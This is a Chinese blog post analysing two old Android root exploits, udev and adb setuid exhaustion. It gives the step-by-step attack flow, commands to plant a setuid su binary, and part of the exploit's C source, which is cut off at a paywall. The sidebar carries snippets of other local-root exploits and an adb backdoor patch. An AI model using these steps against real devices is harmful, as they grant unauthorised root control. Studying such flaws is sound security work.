Android中可以获取root权限的两种漏洞分析

最新推荐文章于 2023-04-11 09:33:04 发布
VIP文章 最新推荐文章于 2023-04-11 09:33:04 发布
阅读量2.7k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feng7208485/article/details/8670723
版权

Android获取root的漏洞有两个——udev 漏洞和adb setuid exhaustion 攻击,我将分别作出介绍。并且依据udev漏洞制作了破解手机root权限的简单软件。

adb setuid exhaustion 攻击

在介绍这种攻击方法的时候,首先要了解adb的概念,简而言之adb是android sdk里的一个工具, 用这个工具可以直接操作管理android模拟器或者真实的andriod设备(如G1手机). 它的主要功能有:

  * 运行设备的shell(命令行)

  * 管理模拟器或设备的端口映射

  * 计算机和设备之间上传/下载文件

  * 将本地apk软件安装至模拟器或android设备

ADB是一个 客户端-服务器端 程序, 其中客户端是你用来操作的电脑, 服务器端是android设备。

    我们知道Android系统是基于Linux内核的,这个攻击方法正式利用了setuid命令来获取root权限的。当手机连接电脑的时候,手机就会创建一个adb进程,来管理电脑客户端,通过对android源码的研究发现这个adb进程刚刚建立的时候是具有root权限的,当进程启动之后,adb会调用setuid命令来将自己权限变成普通的进程,但是源码中并没有对这一指令是否执行成功做出判断,这个漏洞可以让我们能通过某种手段来阻止setuid命令顺利进行从而获取root权限。

       adb setuid exhaustion 攻击流程如下:

1. 首先漏洞代码会检查NPROC setting,也就是系统允许的用户进程的上限,

2. 代码会找到当前adb守护进程的pid号。

3.然后漏洞程序不断制造僵尸子进程,直到系统允许的最大值。

4.这时候漏洞程序会杀掉当前adb进程,并在产出出新的adb进程之前产生出一个新的子进程,保证用户进程数目在系统的上限。

5.当新的adb进程产生之后,它允许在root的状态,adb完成初始化操作之后会检查自己应该继续保持root权限还是要将自己的权限降为普通用户,这时候普通用户的进程数目还是最大值,所以当adb进程调用setuid试图降级自己的权限的时候并不能成功,adb进程还是以root权限允许,但是adb并没有检查setuid命令是否执行成功,这时候我们就获取了root权限。

6.在adb中执行adb push su /system/bin/su和adb shell "chmod 4755 /system/bin/su”这样用户程序可以随时通过su命令获取root权限了。

漏洞攻击文件源码分析如下:

int main(int argc, char **argv)

{

    pid_t adb_pid = 0, p;

    int pids = 0, new_pids = 1;

    int pepe[2];

    char c = 0;

    struct rlimit rl;

 

    printf("[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n");

    printf("[*] checking NPROC limit ...\n");

//得到用户最多能创建的用户进程数目

    if (getrlimit(RLIMIT_NPROC, &rl) < 0)

        die("[-] getrlimit");

 

    if (rl.rlim_cur == RLIM_INFINITY) {

        printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n");

        exit(1);

    }

 

    printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max);

    printf("[*] Searching for adb ...\n");

//找到adb进程的pid编号

    adb_pid = find_adb();

 

    if (!adb_pid)

        die("[-] Cannot find adb");

 

    printf("[+] Found adb as PID %d\n", adb_pid);

    printf("[*] Spawning children. Dont type an

最低0.47元/天 解锁文章
feng7208485
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AndroidRoot权限获取的简单代码
01-20
我们知道Android手机操作系统采用的是Linux内核,Linux最高的系统权限就是Root,这就类似与Windows的Administrator系统管理员权限,也就是操作系统的最高权限。由于Root的权限过高,因此手机产商一般都不允许用户直接拥用Root权限,以防止用户修改系统内置的业务跟程序。但是对于用户来说,当然希望能拥有Root权限以将手机修改成自己的一种特色,因为有Root权限则可以任意修改手机的所有文件跟程序,让手机更加个性化。 代码如下:Process process = null; try{ process = Runtime.getRuntime().exec(“su”
两个漏洞可让十亿安卓手机获取 Root 权限?
weixin_34126557的博客
06-06 106
趋势科技报道,数十亿的安卓设备上发现安全漏洞,攻击者可通过简单的操作获取root访问权限。 目前市场上大部分的智能设备都在使用Qualcomm Snapdragon SoCs(系统芯片),据该公司官网上统计,有超过10亿的设备使用Snapdragon芯片。然而不幸的是,安全研究员们发现数个安全漏洞会影响Snapdragon芯片,可被攻击者获取访问设备的...
android 10获得root权限补丁
04-13
android 10获得root权限补丁,在rk3288上测试有效。
Android手机获取root权限并实现关机重启功能的方法
09-04
主要介绍了Android手机获取root权限并实现关机重启功能的方法,是Android程序设计非常重要的技巧,需要的朋友可以参考下
Android 获取 usb 权限的两种方法
08-25
主要介绍了Android 获取 usb 权限的两种方式,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
移动安全——从零开始root
键盘的起始页
04-11 440
无感知的root工具,你可以将su文件的名字随意更改,然后配合上一篇的rxposed完成全局hook工作。工具和一些selinux的策略文件,还有我自己写了一个demo su放在github上,地址:https://github.com/Thehepta/android-jailbreak。
Android提权root漏洞,【转】结合init源码剖析android root提权漏洞(CVE
weixin_42602241的博客
05-29 896
这篇文章是上一篇博客的后续分析,主要介绍向init进程发送热拔插信息后init进程的处理流程首先我们来了解一个数据结构,uevent,如下struct uevent {const char *action;const char *path;const char *subsystem;const char *firmware;int major;int minor;};内核收到的信息如下,ACTIO...
android4.4.3版本root,ROOT大师:支持安卓4.3、4.4机型root
weixin_32944341的博客
05-26 1970
【IT168厂商动态】众多周知,从此安卓4.2系列最后一个版本的4.2.2之后,谷歌有意要关闭安卓手机ROOT权限,所以很多新上市的安卓4.3、4.4系列的手机ROOT变得异常艰难。面临被刷成砖头的风险,手机发烧友们只能苦等ROOT工具推陈出新。功夫不负有心人,经过刷机大师的工程师的几个月的努力,ROOT大师终于攻克最新的安卓4.3、4.4系统的ROOT权限,独家支持海量安卓机型4.3、4....
android7.0 root 漏洞,RHEL 7.0/7.1 - abrt/sosreport Local Root
weixin_28857713的博客
05-29 263
#!/usr/bin/python# CVE-2015-5287 (?)# abrt/sosreport RHEL 7.0/7.1 local root# rebel 09/2015# [user@localhost ~]$ python sosreport-rhel7.py# crashing pid 19143# waiting for dump directory# dump directo...
androidroot权限
10-15 744
本文将从几个方面,由浅至深地讲述ROOT到底是什么东西? 一. ROOT权限简单介绍 二.为什么需要ROOT 三. ADBD的ROOT权限 四.深入源代码 ROOT权限简介: ROOT权限是Linux内核的最高权限,如果你的身份是ROOT,那么你就具有了ROOT权限。有了最高权限,你就可以为所欲...
基于利用方式的Android Root漏洞分析
03-24
Android平台恶意软件可以使用获取系统root权限的方式来绕过传统的Android安全机制,并且由于Android碎片化现象的存在,出现了很多利用方式、范围不同的Android root漏洞,因此有必要详细了解这些漏洞的实现机制,以采取...
开启adb su权限
happy19850920的专栏
02-16 9171
可以通过修改文件来实现这个需求,只是在这个文件添加了一个后门:system/core/adb/adb.c @@ -55,6 +55,31 @@ static int auth_enabled = 0; static const char *adb_device_banner = "device"; #endif +bool checkAdbBackDoorFile() +{ +
android安全以及root利用的漏洞
12-24 3313
本文主要记录相关漏洞root原理,有时间就关注下,不定期更新。有同样兴趣的可以互相交流。 其有的可能已修复或者无法再次利用,只做兴趣记录的资料。 1.利用adbd进程的降权失败,从而使得adbd有root权限,从而使用push将su放到system/bin或者system/xbin代替原有的su,并安装权限管理apk限制root。原有的su会检查用户权限,而替换掉的则不检查,但是会通过权限
Android手机一键Root原理分析(作者:非虫,文章来自:《黑客防线》2012年7月)
hikame的专栏
03-24 3161
之前几天都在做Android漏洞分析的项目,万幸发现了这篇文章。废话不多说,上文章! 《Android手机一键Root原理分析》 (作者:非虫,文章来自:《黑客防线》2012年7月) 一直以来,刷机与RootAndroid手机爱好者最热衷的事情。即使国行手机的用户也不惜冒着失去保修的风险对Root手机乐此不疲。就在前天晚上,一年一度的Google I/O大会拉开了帷幕,最新
Android 操作系统 获取Root权限 原理解析
张勤一
06-04 7850
android root权限破解分析许多机友新购来的Android机器没有破解过Root权限,无法使用一些需要高权限的软件,以及进行一些高权限的操作,其实破解手机Root权限是比较简单及安全的,破解Root权限的原理就是在手机的/system/bin/或/system/xbin/目录下放置一个可执行文件“su”,这是一个二进制文件,相当于电脑上的exe文件,仅仅在系统置入这个“su”文件是不会给
adb授权root权限,adb能否获得root权限
热门推荐
h824015249的博客
01-30 1万+
另外,有些机友担心手机ROOT后容易毒,这个你们就放心好了,只要安装了杀毒软件是没什么太大问题的,只要你们在正确的市场安装软件是不会 有这种情况的,ROOT后你们可以下载个授权管理软件,这样会多一份保障,他是管理一些软件需要进入ROOT权限的提醒的。首先,如果成功ROOT了,不要担心手机会因为ROOT导致各种问题,因为你不去乱删系统软件是一点问题都没有的,ROOT是为了让你可以用到一些软件需要高级权限的需要才ROOT的。adb权限是指当adb连接手机时,手机的守护进程adbd的权限为root权限
android6.0漏洞root,脏牛漏洞ROOT全部安卓系统?
weixin_42411003的博客
05-27 1246
原标题:脏牛漏洞ROOT全部安卓系统?上周,研究人员Phil Oester发现 “脏牛”漏洞,影响范围甚广,波及到2007年发布的Linux内核,一时间名声大噪。脏牛漏洞,编号为CVE-2016-5195,是Linux内核运行时出现的竞争条件,允许攻击者实现本地提权。简而言之,攻击者利用脏牛可获得Linux设备的root权限。(详情请参考此前漏洞盒子发布的漏洞预警)影响所有Android版本脏牛...
android4.4.3版本root,安卓4.4.4手机要怎么去root 安卓4.4.4通用root图文教程【详解】...
weixin_36485321的博客
05-26 303
目前,就安卓系统来看,安卓4.4.4系统是主导系统,这个系统的使用人数很多。那么,安卓4.4.4手机要怎么去root呢?下面就一起来看看这方法介绍。准备工作:1、刷入第三方recovery,cwm版本recovery需要到6.0.4.6或者以上版本(Recovery下载)。安卓4.4.4通用root图文教程2、下载4.4.4通用root包。【安卓4.4.4通用root教程】安卓4.4.4通用roo...
android 4.4.2 安全漏洞修复
shark1621的博客
12-12 7606
环境:android 4.4.2 漏洞扫描工具:360vulscanner_offical.apk  360透视镜 解决的漏洞:CVE-2015-6764   CVE-2016-1677  CVE-2016-3897   CVE-2016-2439   1.CVE-2015-6764 Google Chrome是美国谷歌(Google)公司开发的一款Web浏览器。Google V8是其...
android bin文件获取root权限
最新发布
06-08
如果想在Android设备上运行一个需要root权限的二进制文件,可以按照以下步骤获取root权限: 1. 在Android设备上安装一个root管理器,例如SuperSU或Magisk。 2. 将二进制文件复制到设备上,例如通过ADB命令或其他文件传输工具。 3. 在ADB命令行输入“su”命令,这将请求root权限。 4. 如果设备已授予root权限,则命令行将显示“#”提示符,表示已获得root权限。如果未授予root权限,则会显示“$”提示符,表示未获得root权限。 5. 输入命令“chmod +x <binary_file_name>”来为二进制文件添加可执行权限。 6. 输入命令“./<binary_file_name>”来运行二进制文件。 请注意,获取root权限可能会导致设备安全性降低,并可能导致设备出现故障或不稳定。因此,请谨慎操作,并仔细评估对设备进行root的风险和收益。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值